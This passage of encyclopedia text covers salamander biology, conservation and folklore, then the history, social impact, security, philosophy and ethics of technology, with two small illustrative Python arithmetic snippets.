of the females. Visual cues are also thought to be important in some plethodont species. Except for terrestrial species in the three families Plethodontidae, Ambystomatidae, and Salamandridae, salamanders mate in water. The mating varies from courtship between a single male and female to explosive group breeding. In the clade Salamandroidea, which makes up about 90% of all species, fertilization is internal. As a general rule, salamanders with internal fertilization have indirect sperm transfer, but in species like the Sardinian brook salamander, the Corsican brook salamander, the Caucasian salamander, and the Pyrenean brook salamander, the male transfers his sperm directly into the female's cloaca. For the species with indirect sperm transfer, the male deposits a spermatophore on the ground or in the water according to species, and the female picks this up with her vent. The spermatophore has a packet of sperm supported on a conical gelatinous base, and often an elaborate courtship behavior is involved in its deposition and collection. Once inside the cloaca, the spermatozoa move to the spermatheca, one or more chambers in the roof of the cloaca, where they are stored for sometimes lengthy periods until the eggs are laid. In the Asiatic salamanders, the giant salamanders, and the Sirenidae, which are the most primitive groups, fertilization is external. In a reproductive process similar to that of typical frogs, the male releases sperm onto the egg mass. In these groups, it is the males that exhibit parental care, which otherwise occurs only in females of species with internal fertilization. Three different types of egg deposition occur. Ambystoma and Taricha spp. spawn large numbers of small eggs in quiet ponds where large predators are unlikely to be found. Most dusky salamanders (Desmognathus) and Pacific giant salamanders (Dicamptodon) lay smaller batches of medium-sized eggs in a concealed site in flowing water, and these are usually guarded by an adult, normally the female. 
Many of the tropical climbing salamanders (Bolitoglossa) and lungless salamanders (Plethodontinae) lay a small number of large eggs on land in a well-hidden spot, where they are also guarded by the mother. Some species such as the fire salamanders (Salamandra) are ovoviviparous, with the female retaining the eggs inside her body until they hatch, either into larvae to be deposited in a water body, or into fully formed juveniles. In temperate regions, reproduction is usually seasonal, and salamanders may migrate to breeding grounds. Males usually arrive first and in some instances set up territories. Typically, a larval stage follows in which the organism is fully aquatic. The tadpole has three pairs of external gills, no eyelids, a long body, a laterally flattened tail with dorsal and ventral fins, and, in some species, limb buds or limbs. Pond-type larvae may have a pair of rod-like balancers on either side of the head, long gill filaments, and broad fins. Stream-type larvae are more slender, with short gill filaments, narrower fins, and no balancers, but instead hatch with their hind limbs already developed; in Rhyacotriton and Onychodactylus, and some species of Batrachuperus, the gills and gill rakers are extremely reduced. The tadpoles are carnivorous, and the larval stage may last from days to years, depending on the species. Sometimes this stage is completely bypassed, and the eggs of most lungless salamanders (Plethodontidae) develop directly into miniature versions of the adult without an intervening larval stage. By the end of the larval stage, the tadpoles already have limbs, and metamorphosis takes place normally. In salamanders, this occurs over a short period of time and involves the closing of the gill slits and the loss of structures such as gills and tail fins that are not required as adults. At the same time, eyelids develop, the mouth becomes wider, a tongue appears, and teeth are formed. The aquatic larva emerges onto land as a terrestrial adult. Not all species of salamanders follow this path. Neoteny, also known as paedomorphosis, has been observed in all salamander families, and may be universally possible in all salamander species. In this state, an individual may retain gills or other juvenile features while attaining reproductive maturity. The changes that take place at metamorphosis are under the control of thyroid hormones, and in obligate neotenes such as the axolotl (Ambystoma mexicanum), the tissues are seemingly unresponsive to the hormones. In other species, the changes may not be triggered because of underactivity of the hypothalamus-pituitary-thyroid mechanism, which may occur when conditions in the terrestrial environment are too inhospitable. This may be due to cold or wildly fluctuating temperatures, aridity, lack of food, lack of cover, or insufficient iodine for the formation of thyroid hormones. Genetics may also play a part. The larvae of tiger salamanders (Ambystoma tigrinum), for example, develop limbs soon after hatching and, in seasonal pools, promptly undergo metamorphosis. Other larvae, especially in permanent pools and warmer climates, may not undergo metamorphosis until they reach full adult size. Other populations in colder climates may not metamorphose at all, and become sexually mature while in their larval forms. Neoteny allows the species to survive even when the terrestrial environment is too harsh for the adults to thrive. Conservation A general decline in living amphibian species has been linked with the fungal disease chytridiomycosis. 
A higher proportion of salamander species than of frogs or caecilians are in one of the at-risk categories established by the IUCN. Salamanders showed a significant diminution in numbers in the last few decades of the 20th century, although no direct link between the fungus and the population decline has yet been found. The IUCN made further efforts in 2005, establishing the Amphibian Conservation Action Plan (ACAP), which was subsequently followed by the Amphibian Ark (AArk), the Amphibian Specialist Group (ASG), and finally the umbrella organization known as the Amphibian Survival Alliance (ASA). Researchers also cite deforestation, resulting in fragmentation of suitable habitats, and climate change as possible contributory factors. Species such as Pseudoeurycea brunnata and Pseudoeurycea goebeli that had been abundant in the cloud forests of Guatemala and Mexico during the 1970s were found by 2009 to be rare. Few data have been gathered on population sizes over the years, but by intensive surveying of historic and suitable new locations, it has been possible to locate individuals of other species, such as Parvimolge townsendi, which had been thought to be extinct. Currently, the major lines of defense for the conservation of salamanders include both in situ and ex situ methods. Conservation breeding programs (CBPs) are in place for certain salamander species, but research should be done beforehand to determine whether a given species will actually benefit from a CBP, as researchers have noted that some species of amphibians fail completely in this environment. Various conservation initiatives are being attempted around the world. The Chinese giant salamander, at 1.8 m (6 ft) the largest amphibian in the world, is critically endangered, as it is collected for food and for use in traditional Chinese medicine. An environmental education programme is being undertaken to encourage sustainable management of wild populations in the Qinling Mountains, and captive breeding programmes have been set up. The hellbender is another large, long-lived species with dwindling numbers and fewer juveniles reaching maturity than previously. Another alarming finding is the increase in abnormalities in up to 90% of the hellbender population in the Spring River watershed in Arkansas. Habitat loss, silting of streams, pollution, and disease have all been implicated in the decline, and a captive breeding programme at Saint Louis Zoo has been successfully established. Of the 20 species of minute salamanders (Thorius spp.) in Mexico, half are believed to have become extinct and most of the others are critically endangered. Specific reasons for the decline may include climate change, chytridiomycosis, or volcanic activity, but the main threat is habitat destruction as logging, agricultural activities, and human settlement reduce their often tiny, fragmented ranges. Survey work is being undertaken to assess the status of these salamanders, and to better understand the factors involved in their population declines, with a view to taking action. Ambystoma mexicanum, an aquatic salamander, has been protected under the Mexican UMA (Unit for Management and Conservation of Wildlife) since April 1994. Another detrimental factor is that the axolotl has lost its role as a top predator since the introduction of locally exotic species such as Nile tilapia and carp. 
Tilapia and carp directly compete with axolotls by consuming their eggs, larvae, and juveniles. Climate change has also greatly affected axolotls and their populations throughout southern Mexico. Because Lake Xochimilco lies close to Mexico City, officials are currently working on programs there to bring in tourism and educate the local population on the restoration of the natural habitat of these creatures. This proximity has been a large factor in the survival of the axolotl, as the city has expanded to take over the Xochimilco region in order to make use of its resources for water supply and sewage. The axolotl is farmed for use in research facilities, and so may one day return to its natural habitat. The recent decline in population has substantially reduced genetic diversity among populations, making further scientific progress difficult. Some loss of genetic diversity due to paedomorphosis in Ambystoma species such as the axolotl does not account for the overall lack of diversity. Evidence points toward a historical bottleneck in Ambystoma that contributes to the low variation, leaving no large gene pool to draw from and raising concern about inbreeding due to lack of gene flow. One way researchers are looking into maintaining genetic diversity within the population is via cryopreservation of spermatophores from male axolotls. This is a safe and non-invasive method that involves collecting the spermatophores and placing them in a deep freeze for preservation. Most importantly, researchers have found that only limited damage is done to the spermatophores upon thawing, making this a viable option. As of 2013, the method was being used to save not only the axolotl but also numerous other members of the salamander family. Research is being done on the environmental cues that have to be replicated before captive animals can be persuaded to breed. Common species such as the tiger salamander and the mudpuppy are being given hormones to stimulate the production of sperm and eggs, and the role of arginine vasotocin in courtship behaviour is being investigated. Another line of research is artificial insemination, either in vitro or by inserting spermatophores into the cloacae of females. The results of this research may be used in captive-breeding programmes for endangered species. Taxonomy The order name Urodela comes from the name Urodèles given by André Marie Constant Duméril in 1805; it is derived from the Greek words ourā́ "tail" and dēlos "visible, conspicuous", referring to their "persistent" tails. Disagreement exists among different authorities as to the definition of the terms Caudata and Urodela. Some maintain that Urodela should be restricted to the crown group, with Caudata being used for the total group. Others restrict the name Caudata to the crown group and use Urodela for the total group. The former approach seems to be most widely adopted and is used in this article. The ten families belonging to the Urodela are divided into three suborders. The clade Neocaudata is often used to separate the Cryptobranchoidea and Salamandroidea from the Sirenoidea. Phylogeny and evolution The origins of and evolutionary relationships between the three main groups of amphibians (gymnophionans, urodeles, and anurans) are a matter of debate. 
A 2005 molecular phylogeny, based on rDNA analysis, suggested that the first divergence between these three groups took place soon after they had branched from the lobe-finned fish in the Devonian (around 360 million years ago), and before the breakup of the supercontinent Pangaea. The briefness of this period, and the speed at which radiation took place, may help to account for the relative scarcity of amphibian fossils that appear to be closely related to lissamphibians. More recent studies generally find a more recent (Late Carboniferous to Permian) age for the basalmost divergence among lissamphibians. The earliest known salamander-line lissamphibian is Triassurus from the Middle-Late Triassic of Kyrgyzstan. Other fossil salamanders are known from the Middle-Late Jurassic of Eurasia, including Kokartus honorarius from the Middle Jurassic of Kyrgyzstan, two species of the apparently neotenic, aquatic Marmorerpeton from the Middle Jurassic of England and Scotland, and Karaurus from the Middle-Late Jurassic of Kazakhstan, which resembled modern mole salamanders in morphology and probably had a similar burrowing lifestyle. These early forms looked like robust modern salamanders but lacked a number of anatomical features that characterise all modern salamanders. The two groups of extant salamanders are the Cryptobranchoidea (which includes the Asiatic and giant salamanders) and the Salamandroidea (which includes all other living salamanders), also known as the Diadectosalamandroidei. Both groups are known from the Middle-Late Jurassic of China, the former being exemplified by Chunerpeton tianyiensis, Pangerpeton sinensis, Jeholotriton paradoxus, Regalerpeton weichangensis, Liaoxitriton daohugouensis, and Iridotriton hechti, and the latter by Beiyanerpeton jianpingensis. By the Upper Cretaceous, most or all of the living salamander families had probably appeared. The following cladogram shows the relationships between salamander families based on the molecular analysis of Pyron and Wiens (2011). The position of the Sirenidae is disputed, but a position as sister to the Salamandroidea best fits the molecular and fossil evidence. Genome and genetics Salamanders possess gigantic genomes, spanning the range from 14 Gb to 120 Gb (the human genome is 3.2 Gb long). The genomes of Pleurodeles waltl (20 Gb) and Ambystoma mexicanum (32 Gb) have been sequenced. Their giant genomes have strongly affected their physiology, including their skeletal and circulatory systems, and have led to a simplified brain, a weak heart, and a slow metabolism. The cellular mechanisms that prevent transposons from accumulating seem to be partially defective in salamanders. Some species with the largest genomes have lost the ability to go through metamorphosis. Compared to their ancestors, the development of the body lags behind its growth and stops at a certain age, leaving them with embryonic traits. Salamander tissues contain cells that differentiate slowly, weakly, or not at all, owing to intron delay; this gives them regenerative properties, extending to parts of the face and eye, the lungs, liver, and heart, and even the spinal cord and brain, and they have been described as "walking bags of stem cells". Research has also shown that they do not develop typical signs of aging and do not accumulate age-related diseases like cancer. 
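To put the genome figures above in perspective, the following short Python sketch, illustrative only and using just the sizes quoted in the text, computes how many times larger each salamander genome is than the human genome:

```python
# Rough scale comparison using only the genome sizes quoted above (in gigabases, Gb).
HUMAN_GENOME_GB = 3.2

salamander_genomes_gb = {
    "smallest salamander genome": 14.0,
    "Pleurodeles waltl": 20.0,
    "Ambystoma mexicanum (axolotl)": 32.0,
    "largest salamander genome": 120.0,
}

for name, size_gb in salamander_genomes_gb.items():
    ratio = size_gb / HUMAN_GENOME_GB
    print(f"{name}: {size_gb:g} Gb, about {ratio:.1f} times the human genome")
```

Run as written, this reports ratios ranging from roughly 4.4 times the human genome for the smallest salamander genomes to about 37.5 times for the largest, with the sequenced axolotl genome at about 10 times.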
In human society Myth and legend Legends have developed around the salamander over the centuries, many related to fire. This connection likely originates from the tendency of many salamanders to dwell inside rotting logs. When a log was placed into a fire, the salamander would attempt to escape, lending credence to the belief that salamanders were created from flames. The association of the salamander with fire appeared first in Antiquity, with Aristotle (History of Animals 5, 17) and with Pliny the Elder, who wrote in his Natural History (10, 86) that "A salamander is so cold that it puts out fire on contact. It vomits from its mouth a milky liquid; if this liquid touches any part of the human body, it causes all the hair to fall off, and the skin to change color and break out in a rash." The claimed ability to put out fire was repeated by Saint Augustine in the fifth century and Isidore of Seville in the seventh century. The mythical ruler Prester John supposedly had a robe made from alleged salamander hair, in fact asbestos fibre, already known to ancient Greece and Rome (the linum vivum of Pliny the Elder's Naturalis historia, 19, 4). The "Emperor of India" possessed a suit made from a thousand skins; Pope Alexander III had a tunic which he valued highly, and William Caxton (1481) wrote: "This Salemandre berithe wulle, of which is made cloth and gyrdles that may not brenne in the fyre." The salamander was said to be so toxic that by twining around a tree, it could poison the fruit and so kill any who ate them, and by falling into a well, could kill all who drank from it. Wealthy Persians amazed guests by cleaning a cloth by exposing it to fire. For example, according to Tabari, one of the curious items belonging to Khosrow II Parviz, the great Sassanian king (r. 590–628), was a napkin that he cleaned simply by throwing it into fire. Such cloth is believed to have been made of asbestos imported over the Hindu Kush. According to Biruni in his book Gems, any cloths made of asbestos (āzarshost) were called shostakeh. Some Persians believed the fiber was the fur of an animal called the samandar, which lived in fire and died when exposed to water; this may be where the belief originated that the salamander could tolerate fire. Charlemagne, the first Holy Roman Emperor (800–814), is also said to have possessed such a tablecloth. Marco Polo recounts having been shown, in a place he calls Ghinghin talas, "a good vein from which the cloth which we call of salamander, which cannot be burnt if it is thrown into the fire, is made ..." In his autobiography, Benvenuto Cellini relates a childhood memory of being shown a salamander in the fire. The Japanese giant salamander has been the subject of legend and artwork in Japan (e.g. the ukiyo-e work by Utagawa Kuniyoshi). The Japanese mythological creature known as the kappa may be inspired by this salamander. Medical research Salamanders' limb regeneration has long been the focus of interest among scientists. The first extensive cell-level study was by Vincenzo Colucci in 1886. Researchers have been trying to find out the conditions required for the growth of new limbs, and hope that such regeneration could be replicated in humans using stem cells. Axolotls have been used in research and have been genetically engineered so that a fluorescent protein is present in cells in the leg, enabling the cell division process to be tracked under the microscope. It seems that after the loss of a limb, cells draw together to form a clump known as a blastema. This superficially appears undifferentiated, but cells that originated in the skin later develop into new skin, muscle cells into new muscle, and cartilage cells into new cartilage. 
It is only the cells from just beneath the surface of the skin that are pluripotent and able to develop into any type of cell. Researchers from the Australian Regenerative Medicine Institute have found that when macrophages were removed, salamanders lost their ability to regenerate and instead formed scar tissue. If the processes involved in forming new tissue can be reverse engineered into humans, it may be possible to heal injuries of the spinal cord or brain, repair damaged organs, and reduce scarring and fibrosis after surgery. The spotted salamander (Ambystoma maculatum) lives in a symbiotic relationship with a green alga known as Oophila amblystomatis. The algal cells make their way into tissue cells throughout the embryo's body and appear to avoid rejection by activating genes which suppress the embryo's immune response, a mechanism that could potentially be used in treating autoimmune diseases in humans. Brandy A 1995 article in the Slovenian weekly magazine Mladina publicized salamander brandy, a liquor supposedly indigenous to Slovenia. It was said to combine hallucinogenic and aphrodisiac effects, and to be made by putting several live salamanders in a barrel of fermenting fruit. Stimulated by the alcohol, they secrete toxic mucus in defense and eventually die. Besides causing hallucinations, the neurotoxins present in the brew were said to cause extreme sexual arousal. Later research by the Slovenian anthropologist Miha Kozorog (University of Ljubljana) paints a very different picture: salamander in brandy appears to have been traditionally seen as an adulterant, one which caused ill health. It was also used as a term of slander.
Biology and health sciences
Amphibians
null
29816
https://en.wikipedia.org/wiki/Technology
Technology
Technology is the application of conceptual knowledge to achieve practical goals, especially in a reproducible way. The word technology can also mean the products resulting from such efforts, including both tangible tools such as utensils or machines, and intangible ones such as software. Technology plays a critical role in science, engineering, and everyday life. Technological advancements have led to significant changes in society. The earliest known technology is the stone tool, used during prehistory, followed by the control of fire, which in turn contributed to the growth of the human brain and the development of language during the Ice Age, according to the cooking hypothesis. The invention of the wheel in the Bronze Age allowed greater travel and the creation of more complex machines. More recent technological inventions, including the printing press, the telephone, and the Internet, have lowered barriers to communication and ushered in the knowledge economy. While technology contributes to economic development and improves human prosperity, it can also have negative impacts like pollution and resource depletion, and can cause social harms like technological unemployment resulting from automation. As a result, philosophical and political debates about the role and use of technology, the ethics of technology, and ways to mitigate its downsides are ongoing. Etymology Technology is a term dating back to the early 17th century that meant 'systematic treatment' (from Greek tekhnologia, from tekhnē 'art, craft' and -logia 'study, knowledge'). It is predated in use by the Ancient Greek word tékhnē, used to mean 'knowledge of how to make things', which encompassed activities like architecture. Starting in the 19th century, continental Europeans started using the terms Technik (German) or technique (French) to refer to a 'way of doing', which included all technical arts, such as dancing, navigation, or printing, whether or not they required tools or instruments. At the time, Technologie (German and French) referred either to the academic discipline studying the "methods of arts and crafts", or to the political discipline "intended to legislate on the functions of the arts and crafts." The distinction between Technik and Technologie is absent in English, and so both were translated as technology. The term was previously uncommon in English and mostly referred to the academic discipline, as in the Massachusetts Institute of Technology. In the 20th century, as a result of scientific progress and the Second Industrial Revolution, technology stopped being considered a distinct academic discipline and took on its current meaning: the systemic use of knowledge to practical ends. History Prehistoric Tools were initially developed by hominids through observation and trial and error. Around 2 Mya (million years ago), they learned to make the first stone tools by hammering flakes off a pebble, forming a sharp hand axe. This practice was refined 75 kya (thousand years ago) into pressure flaking, enabling much finer work. The discovery of fire was described by Charles Darwin as "possibly the greatest ever made by man". Archaeological, dietary, and social evidence point to "continuous [human] fire-use" at least 1.5 Mya. Fire, fueled with wood and charcoal, allowed early humans to cook their food to increase its digestibility, improving its nutrient value and broadening the number of foods that could be eaten. The cooking hypothesis proposes that the ability to cook promoted an increase in hominid brain size, though some researchers find the evidence inconclusive. 
Archaeological evidence of hearths has been dated to 790 kya; researchers believe this is likely to have intensified human socialization and may have contributed to the emergence of language. Other technological advances made during the Paleolithic era include clothing and shelter. No consensus exists on the approximate time of adoption of either technology, but archaeologists have found evidence of clothing from 90–120 kya and of shelter from 450 kya. As the Paleolithic era progressed, dwellings became more sophisticated and elaborate; as early as 380 kya, humans were constructing temporary wood huts. Clothing, adapted from the fur and hides of hunted animals, helped humanity expand into colder regions; humans began to migrate out of Africa around 200 kya, initially moving to Eurasia. Neolithic The Neolithic Revolution (or First Agricultural Revolution) brought about an acceleration of technological innovation, and a consequent increase in social complexity. The invention of the polished stone axe was a major advance that allowed large-scale forest clearance and farming. The use of polished stone axes increased greatly in the Neolithic, but they were originally used in the preceding Mesolithic in some areas such as Ireland. Agriculture fed larger populations, and the transition to sedentism allowed for the simultaneous raising of more children, as infants no longer needed to be carried around by nomads. Additionally, children could contribute labor to the raising of crops more readily than they could participate in hunter-gatherer activities. With this increase in population and availability of labor came an increase in labor specialization. What triggered the progression from early Neolithic villages to the first cities, such as Uruk, and the first civilizations, such as Sumer, is not specifically known; however, the emergence of increasingly hierarchical social structures and specialized labor, of trade and war among adjacent cultures, and the need for collective action to overcome environmental challenges such as irrigation, are all thought to have played a role. The invention of writing led to the spread of cultural knowledge and became the basis for history, libraries, schools, and scientific research. Continuing improvements led to the furnace and bellows and provided, for the first time, the ability to smelt and forge gold, copper, silver, and lead – native metals found in relatively pure form in nature. The advantages of copper tools over stone, bone, and wooden tools were quickly apparent to early humans, and native copper was probably used from near the beginning of Neolithic times (about 10 kya). Native copper does not naturally occur in large amounts, but copper ores are quite common, and some of them produce metal easily when burned in wood or charcoal fires. Eventually, the working of metals led to the discovery of alloys such as bronze and brass (about 4,000 BCE). The first use of iron alloys such as steel dates to around 1,800 BCE. Ancient After harnessing fire, humans discovered other forms of energy. The earliest known use of wind power is the sailing ship; the earliest record of a ship under sail is that of a Nile boat dating to around 7,000 BCE. From prehistoric times, Egyptians likely used the power of the annual flooding of the Nile to irrigate their lands, gradually learning to regulate much of it through purposely built irrigation channels and "catch" basins. 
The ancient Sumerians in Mesopotamia used a complex system of canals and levees to divert water from the Tigris and Euphrates rivers for irrigation. Archaeologists estimate that the wheel was invented independently and concurrently in Mesopotamia (in present-day Iraq), the Northern Caucasus (Maykop culture), and Central Europe. Time estimates range from 5,500 to 3,000 BCE, with most experts putting it closer to 4,000 BCE. The oldest artifacts with drawings depicting wheeled carts date from about 3,500 BCE. The oldest known wooden wheel in the world, as of 2024, was found in the Ljubljana Marsh of Slovenia; Austrian experts have established that the wheel is between 5,100 and 5,350 years old. The invention of the wheel revolutionized trade and war. It did not take long to discover that wheeled wagons could be used to carry heavy loads. The ancient Sumerians used a potter's wheel and may have invented it. A stone pottery wheel found in the city-state of Ur dates to around 3,429 BCE, and even older fragments of wheel-thrown pottery have been found in the same area. Fast (rotary) potters' wheels enabled early mass production of pottery, but it was the use of the wheel as a transformer of energy (through water wheels, windmills, and even treadmills) that revolutionized the application of nonhuman power sources. The first two-wheeled carts were derived from travois and were first used in Mesopotamia and Iran in around 3,000 BCE. The oldest known constructed roadways are the stone-paved streets of the city-state of Ur, dating to , and timber roads leading through the swamps of Glastonbury, England, dating to around the same period. The first long-distance road, which came into use around 3,500 BCE, spanned 2,400 km from the Persian Gulf to the Mediterranean Sea, but was not paved and was only partially maintained. In around 2,000 BCE, the Minoans on the Greek island of Crete built a 50 km road leading from the palace of Gortyn on the south side of the island, through the mountains, to the palace of Knossos on the north side of the island. Unlike the earlier road, the Minoan road was completely paved. Ancient Minoan private homes had running water. A bathtub virtually identical to modern ones was unearthed at the Palace of Knossos. Several Minoan private homes also had toilets, which could be flushed by pouring water down the drain. The ancient Romans had many public flush toilets, which emptied into an extensive sewage system. The primary sewer in Rome was the Cloaca Maxima; construction began on it in the sixth century BCE and it is still in use today. The ancient Romans also had a complex system of aqueducts, which were used to transport water across long distances. The first Roman aqueduct was built in 312 BCE. The eleventh and final ancient Roman aqueduct was built in 226 CE. Put together, the Roman aqueducts extended over 450 km, but less than 70 km of this was above ground and supported by arches. Pre-modern Innovations continued through the Middle Ages with the introduction of silk production (in Asia and later Europe), the horse collar, and horseshoes. Simple machines (such as the lever, the screw, and the pulley) were combined into more complicated tools, such as the wheelbarrow, windmills, and clocks. A system of universities, including Oxford and Cambridge, developed and spread scientific ideas and practices. 
The Renaissance era produced many innovations, including the introduction of the movable type printing press to Europe, which facilitated the communication of knowledge. Technology became increasingly influenced by science, beginning a cycle of mutual advancement. Modern Starting in the United Kingdom in the 18th century, the discovery of steam power set off the Industrial Revolution, which saw wide-ranging technological discoveries, particularly in the areas of agriculture, manufacturing, mining, metallurgy, and transport, and the widespread application of the factory system. This was followed a century later by the Second Industrial Revolution, which led to rapid scientific discovery, standardization, and mass production. New technologies were developed, including sewage systems, electricity, light bulbs, electric motors, railroads, automobiles, and airplanes. These technological advances led to significant developments in medicine, chemistry, physics, and engineering. They were accompanied by consequential social change, with the introduction of skyscrapers accompanied by rapid urbanization. Communication improved with the invention of the telegraph, the telephone, the radio, and television. The 20th century brought a host of innovations. In physics, the discovery of nuclear fission in the Atomic Age led to both nuclear weapons and nuclear power. Analog computers were invented and initially dominated the processing of complex data. While the invention of vacuum tubes allowed for digital computing with computers like the ENIAC, their sheer size precluded widespread use until innovations in quantum physics allowed for the invention of the transistor in 1947, which significantly compacted computers and drove the digital transition. Information technology, particularly optical fiber and optical amplifiers, allowed for simple and fast long-distance communication, which ushered in the Information Age and the birth of the Internet. The Space Age began with the launch of Sputnik 1 in 1957, followed by the launch of crewed missions to the Moon in the 1960s. Organized efforts to search for extraterrestrial intelligence have used radio telescopes to detect signs of technology use, or technosignatures, given off by alien civilizations. In medicine, new technologies were developed for diagnosis (CT, PET, and MRI scanning), treatment (like the dialysis machine, defibrillator, pacemaker, and a wide array of new pharmaceutical drugs), and research (like interferon cloning and DNA microarrays). Complex manufacturing and construction techniques and organizations are needed to make and maintain more modern technologies, and entire industries have arisen to develop succeeding generations of increasingly more complex tools. Modern technologies increasingly rely on training and education – their designers, builders, maintainers, and users often require sophisticated general and specific training. Moreover, these technologies have become so complex that entire fields have developed to support them, including engineering, medicine, and computer science; and other fields have become more complex, such as construction, transportation, and architecture. Impact Technological change is the largest cause of long-term economic growth. Throughout human history, energy production was the main constraint on economic development, and new technologies allowed humans to significantly increase the amount of available energy. 
First came fire, which made edible a wider variety of foods, and made it less physically demanding to digest them. Fire also enabled smelting, and the use of tin, copper, and iron tools, used for hunting or tradesmanship. Then came the agricultural revolution: humans no longer needed to hunt or gather to survive, and began to settle in towns and cities, forming more complex societies, with militaries and more organized forms of religion. Technologies have contributed to human welfare through increased prosperity, improved comfort and quality of life, and medical progress, but they can also disrupt existing social hierarchies, cause pollution, and harm individuals or groups. Recent years have brought about a rise in social media's cultural prominence, with potential repercussions on democracy, and on economic and social life. Early on, the internet was seen as a "liberation technology" that would democratize knowledge, improve access to education, and promote democracy. Modern research has turned to investigate the internet's downsides, including disinformation, polarization, hate speech, and propaganda. Since the 1970s, technology's impact on the environment has been criticized, leading to a surge in investment in solar, wind, and other forms of clean energy. Social Jobs Since the invention of the wheel, technologies have helped increase humans' economic output. Past automation has both substituted for and complemented labor; machines replaced humans at some lower-paying jobs (for example in agriculture), but this was compensated by the creation of new, higher-paying jobs. Studies have found that computers did not create significant net technological unemployment. Because artificial intelligence is far more capable than ordinary computing, and is still in its infancy, it is not known whether it will follow the same trend; the question has been debated at length among economists and policymakers. A 2017 survey found no clear consensus among economists on whether AI would increase long-term unemployment. According to the World Economic Forum's "The Future of Jobs Report 2020", AI is predicted to replace 85 million jobs worldwide, and create 97 million new jobs, by 2025. A study of the United States covering 1990 to 2007 by MIT economist Daron Acemoglu showed that each additional robot per 1,000 workers decreased the employment-to-population ratio by about 0.2 percentage points, equivalent to about 3.3 workers, and lowered wages by 0.42%. Concerns about technology replacing human labor, however, are long-standing. As US president Lyndon Johnson said in 1964 upon signing the National Commission on Technology, Automation, and Economic Progress bill: "Technology is creating both new opportunities and new obligations for us, opportunity for greater productivity and progress; obligation to be sure that no workingman, no family must pay an unjust price for progress."
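The arithmetic linking the ratio drop to a worker count in the study summary above can be made explicit with a minimal Python sketch. The working-age population base used here is a purely illustrative assumption, chosen so the result lines up with the "about 3.3 workers" quoted in the text; it is not a value taken from the study itself:

```python
# Illustration of the arithmetic behind the robot-employment figures quoted above.
# One additional robot per 1,000 workers is associated with a drop of about
# 0.2 percentage points in the employment-to-population ratio.
ratio_drop = 0.002  # 0.2 percentage points, expressed as a fraction

# Hypothetical working-age population standing behind every 1,000 employed
# workers; an assumed figure chosen only so the output matches the text.
working_age_population = 1650

jobs_lost_per_robot = ratio_drop * working_age_population
print(f"Implied jobs lost per additional robot: about {jobs_lost_per_robot:.1f}")
```

The point of the sketch is simply that a percentage-point change in the employment-to-population ratio translates into a head count only once a population base is fixed, which is why the study reports both forms of the estimate.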
Security With the growing reliance on technology have come security and privacy concerns. Billions of people use online payment methods such as WeChat Pay, PayPal, and Alipay to help transfer money. Although security measures are in place, some criminals are able to bypass them. In March 2022, North Korean hackers stole over $600 million worth of cryptocurrency from the owner of the game Axie Infinity, and used Blender.io, a mixer that helped them hide their cryptocurrency exchanges, to launder over $20.5 million of it. Because of this, the U.S. Treasury Department sanctioned Blender.io, marking the first time it had taken action against a mixer, in an effort to crack down on North Korean hackers. The privacy of cryptocurrency has been debated: although many customers value it, many also argue that cryptocurrency needs more transparency and stability. Environmental Technology can have both positive and negative effects on the environment. Environmental technology describes an array of technologies which seek to reverse, mitigate, or halt damage to the environment. This can include measures to halt pollution through environmental regulations, capture and storage of pollution, or using pollutant byproducts in other industries. Other examples of environmental technology include efforts to monitor and reverse deforestation. Emerging technologies in the field of climate engineering may be able to halt or reverse global warming and its environmental impacts, although this remains highly controversial. As technology has advanced, so too has its negative environmental impact, with the increased release of greenhouse gases, including methane, nitrous oxide, and carbon dioxide, into the atmosphere, causing the greenhouse effect. This continues to gradually heat the earth, causing global warming and climate change. Measures of technological innovation correlate with a rise in greenhouse gas emissions. Pollution Pollution, the presence of contaminants in an environment that cause adverse effects, may have been present as early as the Inca Empire. The Inca used a lead sulfide flux in the smelting of ores, along with a wind-drafted clay kiln, which released lead into the atmosphere and the sediment of rivers. Philosophy Philosophy of technology is a branch of philosophy that studies the "practice of designing and creating artifacts", and the "nature of the things so created." It emerged as a discipline over the past two centuries, and has grown "considerably" since the 1970s. The humanities philosophy of technology is concerned with the "meaning of technology for, and its impact on, society and culture". Initially, technology was seen as an extension of the human organism that replicated or amplified bodily and mental faculties. Marx framed it as a tool used by capitalists to oppress the proletariat, but believed that technology would be a fundamentally liberating force once it was "freed from societal deformations". Second-wave philosophers like Ortega later shifted their focus from economics and politics to "daily life and living in a techno-material culture", arguing that technology could oppress "even the members of the bourgeoisie who were its ostensible masters and possessors." Third-stage philosophers like Don Ihde and Albert Borgmann represent a turn toward de-generalization and empiricism, and considered how humans can learn to live with technology. Early scholarship on technology was split between two arguments: technological determinism, and social construction. Technological determinism is the idea that technologies cause unavoidable social changes. It usually encompasses a related argument, technological autonomy, which asserts that technological progress follows a natural progression and cannot be prevented. Social constructivists argue that technologies follow no natural progression, and are shaped by cultural values, laws, politics, and economic incentives. 
Modern scholarship has shifted towards an analysis of sociotechnical systems, "assemblages of things, people, practices, and meanings", looking at the value judgments that shape technology. Cultural critic Neil Postman distinguished tool-using societies from technological societies and from what he called "technopolies", societies that are dominated by an ideology of technological and scientific progress to the detriment of other cultural practices, values, and world views. Herbert Marcuse and John Zerzan suggest that technological society will inevitably deprive us of our freedom and psychological health. Ethics The ethics of technology is an interdisciplinary subfield of ethics that analyzes technology's ethical implications and explores ways to mitigate potential negative impacts of new technologies. There is a broad range of ethical issues revolving around technology, from specific areas of focus affecting professionals working with technology to broader social, ethical, and legal issues concerning the role of technology in society and everyday life. Prominent debates have surrounded genetically modified organisms, the use of robotic soldiers, algorithmic bias, and the issue of aligning AI behavior with human values. Technology ethics encompasses several key fields: Bioethics looks at ethical issues surrounding biotechnologies and modern medicine, including cloning, human genetic engineering, and stem cell research. Computer ethics focuses on issues related to computing. Cyberethics explores internet-related issues like intellectual property rights, privacy, and censorship. Nanoethics examines issues surrounding the alteration of matter at the atomic and molecular level in various disciplines including computer science, engineering, and biology. And engineering ethics deals with the professional standards of engineers, including software engineers and their moral responsibilities to the public. A wide branch of technology ethics is concerned with the ethics of artificial intelligence: it includes robot ethics, which deals with ethical issues involved in the design, construction, use, and treatment of robots, as well as machine ethics, which is concerned with ensuring the ethical behavior of artificially intelligent agents. Within the field of AI ethics, significant yet-unsolved research problems include AI alignment (ensuring that AI behaviors are aligned with their creators' intended goals and interests) and the reduction of algorithmic bias. Some researchers have warned against the hypothetical risk of an AI takeover, and have advocated for the use of AI capability control in addition to AI alignment methods. Other fields of ethics have had to contend with technology-related issues, including military ethics, media ethics, and educational ethics. Futures studies Futures studies is the study of social and technological progress. It aims to explore the range of plausible futures and incorporate human values in the development of new technologies. More generally, futures researchers are interested in improving "the freedom and welfare of humankind". It relies on a thorough 